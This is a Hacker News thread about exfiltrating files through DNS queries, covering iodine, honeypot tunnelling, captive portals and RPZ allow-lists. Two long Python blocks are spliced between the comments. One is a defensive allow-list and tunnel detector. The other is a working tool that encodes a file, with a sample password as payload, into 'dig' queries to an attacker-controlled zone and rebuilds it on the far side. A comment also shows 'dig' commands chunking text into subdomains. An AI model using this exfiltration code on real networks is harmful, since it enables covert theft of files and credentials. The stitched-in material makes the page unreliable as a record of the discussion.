[HN Gopher] Exfiltrate Files Using the DNS
___________________________________________________________________
Exfiltrate Files Using the DNS
Author : moviuro
Score : 51 points
Date : 2021-04-01 14:03 UTC (8 hours ago)
(HTM) web link (www.go350.com)
(TXT) w3m dump (www.go350.com)
| geocrasher wrote:
| WGET requests can also be used to exfiltrate data:
| https://miscdotgeek.com/curlytp-every-web-server-is-a-dead-d...
| _wldu wrote:
| I think an allow-based DNS RPZ policy could potentially address
| this, if you could define the names that clients ought to talk
| to. It may be a moving target, but worth trying.
|
| https://tools.ietf.org/id/draft-vixie-dnsop-dns-rpz-00.html
|
| https://lists.redbarn.org/pipermail/dnsfirewalls/2013-March/...
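An allow-based policy of the kind described in the comment above, worked through as an added example (not code from the RPZ draft, the linked mailing list, or any resolver). It applies RPZ-style allow-list semantics (exact names, or "*.suffix" entries that match names strictly below the suffix) to a constructed query log, and then counts how many distinct names each blocked zone attracted, since that count is the footprint a tunnel leaves behind when it is denied. The allow-list, client addresses, domains and log lines are all constructed for the example; "last two labels" as the registered domain is a simplification that a real deployment would replace with the public suffix list.

```python
"""RPZ-style allow-list over a sample query log, plus a per-zone count of
distinct blocked names (the signal a DNS tunnel leaves).

Added example for the thread; not the RPZ draft's or any resolver's code.
Every domain, client address and log line below is constructed.
"""
from collections import defaultdict

# Assumed allow-list. Semantics: an exact name matches itself; "*.suffix"
# matches names strictly below suffix (the suffix itself is NOT covered,
# so it needs its own entry if clients should reach it).
ALLOW = ["*.corp.example", "www.example.com", "*.cdn.example.net"]

# Constructed query log, one "<client> <qname>" per line.
SAMPLE_LOG = """\
10.0.0.5 mail.corp.example
10.0.0.5 www.example.com
10.0.0.5 nbswy3dpeb3w64tmmq.0000.exfil.example
10.0.0.5 mfrgg.0001.exfil.example
10.0.0.5 corp.example
10.0.0.7 img.cdn.example.net
10.0.0.5 x-end.0002.exfil.example
"""


def normalise(name: str) -> str:
    """DNS names are case-insensitive; drop the trailing dot as well."""
    return name.lower().rstrip(".")


def rpz_action(qname: str, allow=ALLOW) -> str:
    """Return 'passthru' if qname is covered by the allow-list, else 'nxdomain'."""
    q = normalise(qname)
    for entry in allow:
        e = normalise(entry)
        if e.startswith("*."):
            # ".corp.example": matches below the suffix only, never the apex,
            # and never look-alikes such as "evilcorp.example".
            if q.endswith(e[1:]):
                return "passthru"
        elif q == e:
            return "passthru"
    return "nxdomain"


def evaluate(log_text: str, allow=ALLOW):
    """Decide every query in the log; returns (client, qname, action) tuples."""
    decisions = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, qname = line.split()
        decisions.append((client, normalise(qname), rpz_action(qname, allow)))
    return decisions


def apex_of(qname: str) -> str:
    # Simplification: the last two labels stand in for the registered domain.
    return ".".join(qname.split(".")[-2:])


def blocked_apex_counts(decisions) -> dict:
    """Number of distinct blocked names seen under each zone."""
    names = defaultdict(set)
    for _client, qname, action in decisions:
        if action == "nxdomain":
            names[apex_of(qname)].add(qname)
    return {apex: len(seen) for apex, seen in names.items()}


def tunnel_suspects(decisions, threshold: int = 3) -> list:
    """Blocked zones that attracted at least `threshold` distinct names:
    a legitimate mistyped host produces one name, a tunnel produces many."""
    counts = blocked_apex_counts(decisions)
    return sorted(apex for apex, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    decided = evaluate(SAMPLE_LOG)
    for client, q, action in decided:
        print(f"{client:10} {action:9} {q}")
    print("suspect zones:", tunnel_suspects(decided))
```

The threshold is the tuning knob: with an allow-list in place the blocked set is small, so even a handful of distinct names under one unknown zone from one client is worth a look, whereas a plain deny-list needs far higher counts to stay quiet.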
| bmurray7jhu wrote:
| Thinkst Canary uses DNS tunnelling to facilitate comms with
| honeypots. DNS tunnelling is a great way to monitor activity on
| controlled access networks without opening ports and
| substantially expanding the attack surface.
|
| https://help.canary.tools/hc/en-gb/articles/360002425837-Wha...
| BuildTheRobots wrote:
| Worth mentioning the Iodine project which allows for arbitrary
| IPv4 to be tunnelled over DNS, which can be useful on a few
| different restrictive networks.
|
| https://code.kryo.se/iodine/
|
| (I also like the naming pun; DNS running on port 53 with Iodine
| having the atomic number 53.)
| lazyweb wrote:
| I'm running one on an older RPi at home. Never really "needed"
| it, but sending text messages for free from an airplane wifi
| somewhere above the Atlantic ocean felt like a nice nerdy flex.
| sybercecurity wrote:
| I've seen it work on most wifi networks where you need to log
| in (or check a box) on a web portal before access. Basically
| anything that uses HTTP redirect captive portals will
| probably work, as UDP port 53 isn't blocked.
| ignoramous wrote:
| For a variation of this technique see this handy privacy-
| preserving metrics collection golang library that uses DNS:
| https://github.com/Jigsaw-Code/choir
|
| Currently used by the Jigsaw group at Google to collect metrics
| from behind censoring ISPs.
| LinuxBender wrote:
| Along this line, it might be fun to set up an encrypted text chat
| server that uses this method. What records would work best,
| rrsig, txt?
| ampdepolymerase wrote:
| Only if you are using DNS over https.
| zamadatix wrote:
| Why not https over DNS :)
| nilsb wrote:
| One could probably do DTLS over DNS.
| yardstick wrote:
| If you are using https/TLS it doesn't really matter what
| inner protocol you use, because it's encrypted so third
| parties can't validate it.
| toast0 wrote:
| If you're using DNS over TLS (or HTTPS, whatever) to the
| origin, sure third parties are limited.
|
| If you're doing DNS over TLS to a public resolver that then
| transmits to an origin, that resolver is a third party that
| can see requests and responses.
| silon42 wrote:
| I guess this is reason enough to block that (DNS over
| TLS)
| m463 wrote:
| dig hi.001.mydomain.com
| dig how.002.mydomain.com
| dig are.003.mydomain.com
| dig you.004.mydomain.com
| cookiengineer wrote:
| You don't need that. TTL zero and dns query header IDs are
| enough. You could even implement a threaded chat, using the
| id as a responded-to sorting mechanism.
|
| Also, TXT can contain binary data, and when using DNS over
| TCP is pretty much unlimited in frame size.
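The label-per-chunk scheme sketched in the two comments above, carried through as an added example (not code from the article or from either commenter). It base32-encodes a file into query names under an assumed attacker-controlled zone, mydomain.com (the name used in the comment), and shows the receiving side reassembling the file from the names its authoritative server logged. The decoder is written for what actually arrives at the server rather than what was sent: queries are duplicated by resolver retries, arrive out of order, and may have their case flipped by 0x20 case randomisation, so the sequence number travels as its own label and the payload is case-folded before decoding. The sample payload and the noisy-path simulation are constructed.

```python
"""Carry a file out in DNS query names and reassemble it from the queries.

Added example illustrating the label-encoding idea from the thread; it is
not code from the article or the commenters. Assumes an attacker-controlled
zone (mydomain.com) whose authoritative server logs what it is asked.
"""
from __future__ import annotations

import base64
import random

ZONE = "mydomain.com"   # assumed zone under attacker control
MAX_LABEL = 63          # RFC 1035: a label is at most 63 octets
MAX_NAME = 253          # RFC 1035: a name is at most 253 octets (presentation form)
END_MARK = "x-end"      # base32 never contains '-', so this cannot collide with data


def encode_queries(data: bytes, chunk_bytes: int = 30) -> list[str]:
    """One query name per chunk, <base32 chunk>.<seq>.<zone>, followed by an
    end marker whose sequence field carries the chunk count.
    30 bytes -> 48 base32 characters, inside the 63-octet label limit; the
    alphabet [a-z2-7] is hostname-safe and '=' padding is dropped."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk_bytes)):
        chunk = data[off:off + chunk_bytes]
        label = base64.b32encode(chunk).decode().rstrip("=").lower()
        name = f"{label}.{seq:04d}.{ZONE}"
        assert len(label) <= MAX_LABEL and len(name) <= MAX_NAME
        names.append(name)
    names.append(f"{END_MARK}.{len(names):04d}.{ZONE}")
    return names


def decode_queries(queries: list[str]) -> bytes | None:
    """Reassemble the file from logged query names. Tolerates duplicates,
    arbitrary order and mixed case. Returns None until every chunk and the
    end marker have been seen."""
    chunks: dict[int, bytes] = {}
    total = None
    suffix = "." + ZONE
    for q in queries:
        q = q.lower().rstrip(".")          # undo 0x20 case randomisation
        if not q.endswith(suffix):
            continue                        # not one of ours
        labels = q[: -len(suffix)].split(".")
        if len(labels) != 2 or not labels[1].isdigit():
            continue                        # not in our <payload>.<seq> shape
        payload, seq = labels[0], int(labels[1])
        if payload == END_MARK:
            total = seq
            continue
        padded = payload + "=" * ((-len(payload)) % 8)   # restore base32 padding
        chunks[seq] = base64.b32decode(padded, casefold=True)
    if total is None or set(chunks) != set(range(total)):
        return None                         # still incomplete
    return b"".join(chunks[i] for i in range(total))


def simulate(data: bytes, seed: int = 7) -> bytes | None:
    """Round trip through a constructed noisy path: some names repeated
    (resolver retries), all shuffled, and case flipped character by character."""
    rnd = random.Random(seed)
    names = encode_queries(data)
    seen = names + rnd.sample(names, min(3, len(names)))
    rnd.shuffle(seen)
    seen = ["".join(c.upper() if rnd.random() < 0.5 else c for c in n) for n in seen]
    return decode_queries(seen)


SAMPLE = b"constructed secret: db_password=hunter2\n" * 3   # constructed input

if __name__ == "__main__":
    for n in encode_queries(SAMPLE)[:2]:
        print("dig +short", n)
    assert simulate(SAMPLE) == SAMPLE
    print("round trip ok")
```

Throughput is bounded by the name length limits: about 30 bytes of payload per query with this layout, which is why real tools pack several data labels into one name and lean on TXT responses for the downstream direction. The same property is what makes the technique visible: a single client issuing hundreds of distinct, never-repeated names under one zone looks like nothing else on the wire.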
| btbuilder wrote:
| I saw a presentation at ShmooCon around 2005 where streaming
| video over DNS was demonstrated.
| eat_veggies wrote:
| This is also possible to do over the browser (just one-way
| communication, unfortunately) using dns-prefetch tags:
|
| https://github.com/veggiedefender/browsertunnel
| 1vuio0pswjnm7 wrote:
| In the text-only browser I use I disable dns-prefetch by
| editing the source code. It may be possible to disable dns-
| prefetch in Firefox through configs.^1 Good luck with other
| browsers.
|
| 1. https://www.ghacks.net/2013/04/27/firefox-prefetching-
| what-y...
| gumby wrote:
| > Once upon a time, a government auditor insisted to me that
| keystroke loggers had to run as root, otherwise they would not
| function properly. So, I wrote a keystroke logger that ran as a
| normal user and showed it to him.
|
| > He wasn't amused. He said that I was violating government IT
| policy by demonstrating the program to him.
|
| I once had a government inspector write us up because the
| secondary containment for our waste solvents was plastic, not
| stainless steel (the instruments emitted the solvents into glass
| containers, so this is just for spillage or minor overflows). I
| pointed out that these solvents were highly reactive with metals
| and our safety officer had specified plastic. She didn't care, so
| we got a ticket.
|
| I went and got some stainless steel pans and placed the plastic
| containers inside them. Then I wrote back that I had purchased
| the steel pans and that the glass collection vessels were now
| enclosed with the steel pans. They canceled the ticket.
|
| Generally I'm in favor of safety regulations but sometimes the
| enforcers are nuts. This was not the only such run-in I've had.
___________________________________________________________________
(page generated 2021-04-01 23:02 UTC)